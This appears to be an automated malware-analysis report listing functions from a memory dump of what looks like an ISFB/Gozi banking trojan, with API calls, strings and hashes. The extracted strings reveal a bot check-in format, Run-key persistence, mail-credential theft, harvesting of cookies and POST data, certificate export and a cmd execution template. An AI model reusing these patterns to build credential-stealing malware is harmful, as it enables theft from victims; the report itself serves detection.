Function 02B753D6, Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 284memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 02B7540E
wsprintfA.USER32 ref: 02B75471
wsprintfA.USER32 ref: 02B754BA
wsprintfA.USER32 ref: 02B754DE
lstrcat.KERNEL32(?,726F7426), ref: 02B75518
wsprintfA.USER32 ref: 02B75537
wsprintfA.USER32 ref: 02B75550
wsprintfA.USER32 ref: 02B75574
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B75591
RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B755B2
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B755D2

Part of subcall function 02B8A378: lstrlen.KERNEL32(00000000,00000000,76D681D0,00000000,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8A3A3
Part of subcall function 02B8A378: lstrlen.KERNEL32(?,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8A3AB
Part of subcall function 02B8A378: strcpy.NTDLL ref: 02B8A3C2
Part of subcall function 02B8A378: lstrcat.KERNEL32(00000000,?), ref: 02B8A3CD
Part of subcall function 02B8A378: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02B94BA0,00000000,05AE8D60), ref: 02B8A3EA

StrTrimA.SHLWAPI(00000000,02B983E4,?,05AE8D60), ref: 02B75606

Part of subcall function 02B8A587: lstrlen.KERNEL32(?,00000000,76D681D0,02B94BD7,612E002F,00000000), ref: 02B8A593
Part of subcall function 02B8A587: lstrlen.KERNEL32(?), ref: 02B8A59B
Part of subcall function 02B8A587: lstrcpy.KERNEL32(00000000,?), ref: 02B8A5B2
Part of subcall function 02B8A587: lstrcat.KERNEL32(00000000,?), ref: 02B8A5BD

lstrcpy.KERNEL32(?,00000000), ref: 02B75635
lstrcat.KERNEL32(?,?), ref: 02B75643
lstrcat.KERNEL32(?,?), ref: 02B7564D
RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B75658
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B75674

Part of subcall function 02B7F02B: memset.NTDLL ref: 02B7F064
Part of subcall function 02B7F02B: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 02B7F070

HeapFree.KERNEL32(00000000,?,?,?,?,05AE8D60,00000001), ref: 02B7573A
HeapFree.KERNEL32(00000000,?,02BA044E,?), ref: 02B7574C
HeapFree.KERNEL32(00000000,?,?,05AE8D60), ref: 02B7575E
HeapFree.KERNEL32(00000000,00000000), ref: 02B75770
HeapFree.KERNEL32(00000000,?), ref: 02B75782

Strings

version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 02B7546B
EMPTY, xrefs: 02B753E0

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
String ID: EMPTY$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 1483892062-304588751
Opcode ID: c00799b6b56ed9d597c7d39ad4ba4aac0d22060c48adbfd44eac6768ca0beee7
Instruction ID: 268d6c3b97115f367f5ca0f54afbd17a4fc4aa5fdd69a8f7238d9f6cbae6c3fb
Opcode Fuzzy Hash: c00799b6b56ed9d597c7d39ad4ba4aac0d22060c48adbfd44eac6768ca0beee7
Instruction Fuzzy Hash: 54B1BC71A40201AFDB11EF69DE81F1A7BE9FB48384F08096AF548D7260D730E965CF56

Uniqueness

Uniqueness Score: -1.00%

Function 02B94970, Relevance: 39.3, APIs: 26, Instructions: 260memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 02B94991
GetTickCount.KERNEL32 ref: 02B949AB
wsprintfA.USER32 ref: 02B949FE
QueryPerformanceFrequency.KERNEL32(?), ref: 02B94A0A
QueryPerformanceCounter.KERNEL32(?), ref: 02B94A15
_aulldiv.NTDLL(?,?,?,?), ref: 02B94A2B
wsprintfA.USER32 ref: 02B94A41
wsprintfA.USER32 ref: 02B94A5F
wsprintfA.USER32 ref: 02B94A76
wsprintfA.USER32 ref: 02B94A97
wsprintfA.USER32 ref: 02B94AD2
wsprintfA.USER32 ref: 02B94AF6
lstrcat.KERNEL32(?,726F7426), ref: 02B94B2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02B94B48
GetTickCount.KERNEL32 ref: 02B94B58
RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B94B6C
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B94B8A
StrTrimA.SHLWAPI(00000000,02B983E4,00000000,05AE8D60), ref: 02B94BBF
lstrcpy.KERNEL32(00000000,00000000), ref: 02B94BEB
lstrcat.KERNEL32(00000000,?), ref: 02B94BF6
lstrcat.KERNEL32(00000000,00000000), ref: 02B94BFA
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 02B94C7B
HeapFree.KERNEL32(00000000,00000000,612E002F,00000000), ref: 02B94C8A
HeapFree.KERNEL32(00000000,00000000,00000000,05AE8D60), ref: 02B94C99
HeapFree.KERNEL32(00000000,00000000), ref: 02B94CAB
HeapFree.KERNEL32(00000000,?), ref: 02B94CBD

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 2878544442-0
Opcode ID: 5af6dfb45539154323ab8b65ce12ce6bcf81712f546433d5c9257efd4e188074
Instruction ID: 67848896e2c039fcb4ed85dbfa197bac240f5941a2b8982099671a1a5b80c273
Opcode Fuzzy Hash: 5af6dfb45539154323ab8b65ce12ce6bcf81712f546433d5c9257efd4e188074
Instruction Fuzzy Hash: 30A14871940206AFDB01EFA9EE85F6A3BF9EB48384F040966F908D3261D730D965CF65

Uniqueness

Uniqueness Score: -1.00%

Function 02B7CE48, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

HeapFree.KERNEL32(00000000,?,LastTask,?,?,76D7F710,00000000,00000000), ref: 02B7CE88
RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 02B7CEA6
HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?,?,?,?,?,?,02B72255), ref: 02B7CED7
HeapFree.KERNEL32(00000000,02B983E4,0000011B,00000000,00000000,00000000,00000000,?,00000001,02B983E4,00000002,?,?), ref: 02B7CF4E
RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 02B7D013
wsprintfA.USER32 ref: 02B7D027
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,02B72255), ref: 02B7D032
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,02B72255), ref: 02B7D04C
HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,02B983E4,00000002,?), ref: 02B7D06E
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 02B7D089
wsprintfA.USER32 ref: 02B7D099
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,02B72255), ref: 02B7D0A4

Part of subcall function 02B794B4: lstrlen.KERNEL32(?,00000000,00000000,76D25520,?,?,?,02B71647,0000010D,00000000,00000000), ref: 02B794E4
Part of subcall function 02B794B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 02B794FA
Part of subcall function 02B794B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,02B71647,0000010D), ref: 02B79530
Part of subcall function 02B794B4: memcpy.NTDLL(00000010,00000000,02B71647,?,?,?,02B71647), ref: 02B7954B
Part of subcall function 02B794B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 02B79569
Part of subcall function 02B794B4: GetLastError.KERNEL32(?,?,?,02B71647), ref: 02B79573
Part of subcall function 02B794B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,02B71647), ref: 02B79599

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000,?,?,?,?,?,?,?,?,?,02B72255), ref: 02B7D0BE
HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,02B983E4,00000002,?,?), ref: 02B7D0CE

Strings

Cmd %s processed: %u, xrefs: 02B7D021
LastTask, xrefs: 02B7CE5B, 02B7CF8F
Cmd %u parsing: %u, xrefs: 02B7D093

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
API String ID: 3733591251-3332907627
Opcode ID: e31dc142dcfb6ceccb0ff1a28ba72ad4ff3fd7e5971e584520433cfc38a73310
Instruction ID: 49bcb986e0092c71dc81ff21421b0218bc0e8cf68b20854fcfe29796872502c8
Opcode Fuzzy Hash: e31dc142dcfb6ceccb0ff1a28ba72ad4ff3fd7e5971e584520433cfc38a73310
Instruction Fuzzy Hash: D3716BB1D40119BFEF20AFA5DD88EBEBB79FB09384B0009AAF515A7150C7315E65CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8BBD2, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 129memoryregistrythreadCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 02B8BBED
RtlEnterCriticalSection.NTDLL(00000000), ref: 02B8BC0A
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 02B8BC5A
DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02B8BC64
GetLastError.KERNEL32 ref: 02B8BC6E
HeapFree.KERNEL32(00000000,00000000), ref: 02B8BC7F
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 02B8BCA1
HeapFree.KERNEL32(00000000,?), ref: 02B8BCD8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 02B8BCEC
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02B8BCF5
SuspendThread.KERNEL32(?), ref: 02B8BD04
CreateEventA.KERNEL32(02B9E0D4,00000001,00000000), ref: 02B8BD18
SetEvent.KERNEL32(00000000), ref: 02B8BD25
CloseHandle.KERNEL32(00000000), ref: 02B8BD2C
Sleep.KERNEL32(000001F4), ref: 02B8BD3F
ResumeThread.KERNEL32(?), ref: 02B8BD63

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 02B8BBDE

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 1011176505-1428018034
Opcode ID: b3f262a1a45cca5e56da36c61f067342e881a9758cb3aa0e0afb794f66c199d7
Instruction ID: aff7afcae0cb1e3db634833faff9b78ba3a9628b3fc903ec6baf401e2ae034e0
Opcode Fuzzy Hash: b3f262a1a45cca5e56da36c61f067342e881a9758cb3aa0e0afb794f66c199d7
Instruction Fuzzy Hash: 0F414072D4010AFFDB10BFA5DA89A6DBBB9FB05388B1449A9F605E3110DB3199A1CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B81D51, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 85librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?), ref: 02B81D6A
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02B917C0), ref: 02B81D74
LoadLibraryA.KERNEL32(ieframe), ref: 02B81D96
LoadLibraryA.KERNEL32(ieui), ref: 02B81D9D
LoadLibraryA.KERNEL32(mshtml), ref: 02B81DA4
LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 02B81DAB
LoadLibraryA.KERNEL32(ieapfltr), ref: 02B81DB2
LoadLibraryA.KERNEL32(urlmon), ref: 02B81DB9
HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll), ref: 02B81E41

Strings

ieapfltr, xrefs: 02B81DAD
WININET.dll, xrefs: 02B81DBB
ieui, xrefs: 02B81D98
inetcpl.cpl, xrefs: 02B81DA6
mshtml, xrefs: 02B81D9F
urlmon, xrefs: 02B81DB4
WININET.DLL, xrefs: 02B81D62
ieframe, xrefs: 02B81D91

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad$AllocFreeHeap
String ID: WININET.DLL$WININET.dll$ieapfltr$ieframe$ieui$inetcpl.cpl$mshtml$urlmon
API String ID: 356845663-1120705325
Opcode ID: 6a8750fa22e409fad2c07ead861d46ac01f8591f239fcd6f1a13e040b3b9387f
Instruction ID: 8c006d42b3ebb37f89e3f002d3fcc32e534a81c4f5eb72d0b6dc363b71bad596
Opcode Fuzzy Hash: 6a8750fa22e409fad2c07ead861d46ac01f8591f239fcd6f1a13e040b3b9387f
Instruction Fuzzy Hash: 9F21A571E41204EBEF20BFE98986AAE7FA5EB047A1F5004E6E50DD3150C7B09951CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02B88601, Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 172stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,02BA0468,Port,?,02BA0468,Secure_Connection,?,02BA0468,User_Name,?,02BA0468,Server,00000000,00000000,00000000), ref: 02B886D9
lstrcpyW.KERNEL32(00000000,02BA0724), ref: 02B886F1
lstrcatW.KERNEL32(00000000,00000000), ref: 02B886F9
lstrlenW.KERNEL32(00000000,?,02BA0468,Password2,?,02BA0468,Port,?,02BA0468,Secure_Connection,?,02BA0468,User_Name,?,02BA0468,Server), ref: 02B8873E
memcpy.NTDLL(00000000,?,?,?), ref: 02B88797
LocalFree.KERNEL32(?,?), ref: 02B887AE

Strings

POP3, xrefs: 02B88656
Secure_Connection, xrefs: 02B886AE
User_Name, xrefs: 02B886A2
HTTPMail, xrefs: 02B88666
SMTP, xrefs: 02B88646
Port, xrefs: 02B886BD
Password2, xrefs: 02B88723
IMAP, xrefs: 02B88676
Server, xrefs: 02B8868B
P, xrefs: 02B8866D

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name
API String ID: 3649579052-2088458108
Opcode ID: 42d16822dc5545cb792de5f2bc5b99b0aecdb570b03d784d27247dd1772b2ef9
Instruction ID: e3c73157471a648d9d99548cbf8bb6eff33b970522eae381e08a065bc3720077
Opcode Fuzzy Hash: 42d16822dc5545cb792de5f2bc5b99b0aecdb570b03d784d27247dd1772b2ef9
Instruction Fuzzy Hash: 32518D75D0021EABCF20BFA5DC849AFBBBAFF44344F5448A5E519B2220DB718950CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B75223, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 156memorystringfileCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02B7523A
lstrlen.KERNEL32(?), ref: 02B75241
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B75258
lstrcpy.KERNEL32(00000000,?), ref: 02B75269
lstrcat.KERNEL32(?,?), ref: 02B75285
lstrcat.KERNEL32(?,.pfx), ref: 02B7528F
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B752A0
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B75338
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 02B75368
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02B75381
CloseHandle.KERNEL32(00000000), ref: 02B7538B
HeapFree.KERNEL32(00000000,?), ref: 02B7539B
HeapFree.KERNEL32(00000000,00000000), ref: 02B753B6
HeapFree.KERNEL32(00000000,?), ref: 02B753C6

Strings

ISFB, xrefs: 02B7531B, 02B75320, 02B75348
.pfx, xrefs: 02B75287

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
String ID: .pfx$ISFB
API String ID: 333890978-2368466137
Opcode ID: d58e489903983077f4d0b9389e849833d240b1fe6b6e4db58100c82fd9d38a0a
Instruction ID: cbef17c7b21943d3242fa0e4a40cc578836ff0a7fc6f69049ffd5519ae7c62a2
Opcode Fuzzy Hash: d58e489903983077f4d0b9389e849833d240b1fe6b6e4db58100c82fd9d38a0a
Instruction Fuzzy Hash: 4C51ABB2800109BFCF21AFA5DD84DAE7B79FF09398B418965F915E3160C7318E21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B90669, Relevance: 27.3, APIs: 3, Strings: 15, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,HTTP/1.1 404 Not Found,0000001A,00000000,?,00000000,02B8279E,?,00000000), ref: 02B90718
HeapFree.KERNEL32(00000000,00000008,?,?), ref: 02B908D1
lstrlen.KERNEL32(00000008,00000000), ref: 02B90923

Strings

HTTP/1.1 404 Not Found, xrefs: 02B90710
Content-Security-Policy-Report-Only:, xrefs: 02B90860
Cache-Control:, xrefs: 02B9082E
Transfer-Encoding:, xrefs: 02B908FC
Content-Security-Policy:, xrefs: 02B90854
chunked, xrefs: 02B908F7
Etag:, xrefs: 02B90848
Access-Control-Allow-Origin:, xrefs: 02B90876, 02B9087B, 02B9088D
Content-Type:, xrefs: 02B90753
Last-Modified:, xrefs: 02B9083C
gzip, xrefs: 02B907BE
no-cache, no-store, must-revalidate, xrefs: 02B90829
X-Frame-Options, xrefs: 02B9086C
Content-Encoding:, xrefs: 02B907A8, 02B90801
Content-Length:, xrefs: 02B9090A

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: FreeHeaplstrlenmemcpy
String ID: chunked$Access-Control-Allow-Origin:$Cache-Control:$Content-Encoding:$Content-Length:$Content-Security-Policy-Report-Only:$Content-Security-Policy:$Content-Type:$Etag:$HTTP/1.1 404 Not Found$Last-Modified:$Transfer-Encoding:$X-Frame-Options$gzip$no-cache, no-store, must-revalidate
API String ID: 462153822-754885170
Opcode ID: 4366d45496c06d7fab7321707416652b80f961d0a41f9f4bc734ba853b9821b2
Instruction ID: dec74faf0a1639ba9915263e9a39019e2e012d84b21d4e2e61fda1e8e6bde8a7
Opcode Fuzzy Hash: 4366d45496c06d7fab7321707416652b80f961d0a41f9f4bc734ba853b9821b2
Instruction Fuzzy Hash: ABA18F71A00201AFEF10EF29C8C5BAA3BA9FF04764B1545E5EC59EB256D7B4E840CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B85BE6, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 174stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(05AE9628,00000000,00000000,76D25520,?), ref: 02B85C09
lstrlen.KERNEL32(?,00000000,00000000,76D25520,?), ref: 02B85C18
lstrlen.KERNEL32(?,00000000,00000000,76D25520,?), ref: 02B85C25
lstrlen.KERNEL32(00000000,00000000,00000000,76D25520,?), ref: 02B85C3D
lstrlen.KERNEL32(?,00000000,00000000,76D25520,?), ref: 02B85C49
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B85C65
wsprintfA.USER32 ref: 02B85D1D
memcpy.NTDLL(00000000,00004000,?), ref: 02B85D62
InterlockedExchange.KERNEL32(02B9E00C,00000000), ref: 02B85D80
HeapFree.KERNEL32(00000000,00000000), ref: 02B85DC3

Part of subcall function 02B7AA89: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02B7AAB2
Part of subcall function 02B7AA89: memcpy.NTDLL(00000000,?,?), ref: 02B7AAC5
Part of subcall function 02B7AA89: RtlEnterCriticalSection.NTDLL(02B9E268), ref: 02B7AAD6
Part of subcall function 02B7AA89: RtlLeaveCriticalSection.NTDLL(02B9E268), ref: 02B7AAEB
Part of subcall function 02B7AA89: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 02B7AB23

Strings

USER: %s, xrefs: 02B85D17
Referer: , xrefs: 02B85C89
Cookie: , xrefs: 02B85CB7
Accept-Language: , xrefs: 02B85C9D
URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: , xrefs: 02B85D48

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
String ID: Accept-Language: $Cookie: $Referer: $URL: %sREF: %sLANG: %sAGENT: %sCOOKIE: %sPOST: $USER: %s
API String ID: 4198405257-1852062776
Opcode ID: 8693620fadad53036d16e2d0a31abf631b19e1a27928871a5187c2eddfe9cd1b
Instruction ID: f3aa199129fac7d3d08feae70b20c2b7150ec2ca40465e2487ed97a2a93d5e4d
Opcode Fuzzy Hash: 8693620fadad53036d16e2d0a31abf631b19e1a27928871a5187c2eddfe9cd1b
Instruction Fuzzy Hash: 79517C71A00209AFDF20AFA5DD84FAE7BAAEB04344F4545A9F919E7210D774DA60CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02B771EC, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 79stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,\sols,\sols,02B76102,?,?,%userprofile%\AppData\Local\,?,00000000,02B723FE), ref: 02B77203
lstrlenW.KERNEL32(\sols,?,00000000,02B723FE), ref: 02B7720E
lstrlenW.KERNEL32(?,?,00000000,02B723FE), ref: 02B77216
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B7722B
lstrcpyW.KERNEL32(00000000,?), ref: 02B7723C
lstrcatW.KERNEL32(00000000,\sols), ref: 02B7724E
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,02B723FE), ref: 02B77253
lstrcatW.KERNEL32(00000000,02B983E0), ref: 02B7725F
lstrcatW.KERNEL32(00000000,?), ref: 02B77267
CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,02B723FE), ref: 02B7726C
lstrcatW.KERNEL32(00000000,02B983E0), ref: 02B77278
lstrcatW.KERNEL32(00000000,00000002), ref: 02B77293
CopyFileW.KERNEL32(?,00000000,00000000,?,00000000,02B723FE), ref: 02B7729B
HeapFree.KERNEL32(00000000,00000000,?,00000000,02B723FE), ref: 02B772A9

Strings

\sols, xrefs: 02B771EC, 02B771ED, 02B7720D, 02B7724C

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
String ID: \sols
API String ID: 3635185113-25449109
Opcode ID: 2097a0ba59af95b699d8dd8f2f0d6491c48475747a70b0543d433778ed4083fd
Instruction ID: 93e8f6aa86394331bc3d3091e8f52a87eb50e62a53a863d9ec46606bc673f990
Opcode Fuzzy Hash: 2097a0ba59af95b699d8dd8f2f0d6491c48475747a70b0543d433778ed4083fd
Instruction Fuzzy Hash: 7F212D32984216BFD3226F65DD89F2BBBBCFF87B84F000A19F54193120DB609821DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02B8FAB4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registrystringfileCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 02B8FAD8

Part of subcall function 02B8E55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,80000001,?,?,?,?,02B94D11,00000000,00000000,00000000), ref: 02B8E581
Part of subcall function 02B8E55A: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,02B94D11,00000000,00000000,00000000), ref: 02B8E5AA
Part of subcall function 02B8E55A: RegCloseKey.ADVAPI32(?,?,?,02B94D11,00000000,00000000,00000000,00000000), ref: 02B8E5E1

RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 02B8FB13
lstrcpyW.KERNEL32(-00000002,?), ref: 02B8FB74
lstrcatW.KERNEL32(00000000,.exe), ref: 02B8FB82
lstrcpyW.KERNEL32(?), ref: 02B8FB9C
lstrcatW.KERNEL32(00000000,.dll), ref: 02B8FBA4

Part of subcall function 02B8447F: lstrlenW.KERNEL32(?,.dll,?,00000000,02B7A218,?,.dll,?,00001000,?,?,?), ref: 02B8448D
Part of subcall function 02B8447F: lstrlen.KERNEL32(DllRegisterServer), ref: 02B8449B
Part of subcall function 02B8447F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 02B844B0

RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 02B8FC02

Part of subcall function 02B87854: lstrlenW.KERNEL32(004F0053,System,00000000,00000000,?,?,02B7F7B7,004F0053,00000000), ref: 02B87860
Part of subcall function 02B87854: memcpy.NTDLL(00000000,004F0053,00000000,00000002,?,?,02B7F7B7,004F0053,00000000), ref: 02B87888
Part of subcall function 02B87854: memset.NTDLL ref: 02B8789A

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 02B8FC37
GetLastError.KERNEL32 ref: 02B8FC42
HeapFree.KERNEL32(00000000,00000000), ref: 02B8FC58
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 02B8FC6A

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 02B8FACD
.exe, xrefs: 02B8FB7C
.dll, xrefs: 02B8FB9E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Closelstrlen$HeapOpenQueryValuelstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 2243210721-2351516416
Opcode ID: d2c3f0010d6b80502b18cae955f137ba2cf57c5be76ffdf0ce22bf6cde4211a5
Instruction ID: fa494bc53ee4aace1c312cc63b7eb650fc132be664ff592ee51d78168fad9311
Opcode Fuzzy Hash: d2c3f0010d6b80502b18cae955f137ba2cf57c5be76ffdf0ce22bf6cde4211a5
Instruction Fuzzy Hash: FC414D71D4011AFBDB11BFA5DE44EAE7BB9FF04384B204995EA08A7150EB31DA11DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B7B598, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02B7B5AD

Part of subcall function 02B9134B: lstrlen.KERNEL32(?,00000008,00000000,?,76D25520,02B81372,?,?,00000000,02B71589,?,00000000,?,02B85B4A,?,00000001), ref: 02B9135A
Part of subcall function 02B9134B: mbstowcs.NTDLL ref: 02B91376

lstrlenW.KERNEL32(00000000,00000000,00000000,7730DBB0,00000000,cmd /C "%s> %s1"), ref: 02B7B5E6
wcstombs.NTDLL ref: 02B7B5F0
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7730DBB0,00000000,cmd /C "%s> %s1"), ref: 02B7B621
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,02B8793E), ref: 02B7B64D
TerminateProcess.KERNEL32(?,000003E5), ref: 02B7B663
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,02B8793E), ref: 02B7B677
GetLastError.KERNEL32 ref: 02B7B67B
GetExitCodeProcess.KERNEL32(?,00000001), ref: 02B7B69B
CloseHandle.KERNEL32(?), ref: 02B7B6AA
CloseHandle.KERNEL32(?), ref: 02B7B6AF
GetLastError.KERNEL32 ref: 02B7B6B3

Strings

D, xrefs: 02B7B5C1
cmd /C "%s> %s1", xrefs: 02B7B59E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
String ID: D$cmd /C "%s> %s1"
API String ID: 2463014471-2226621151
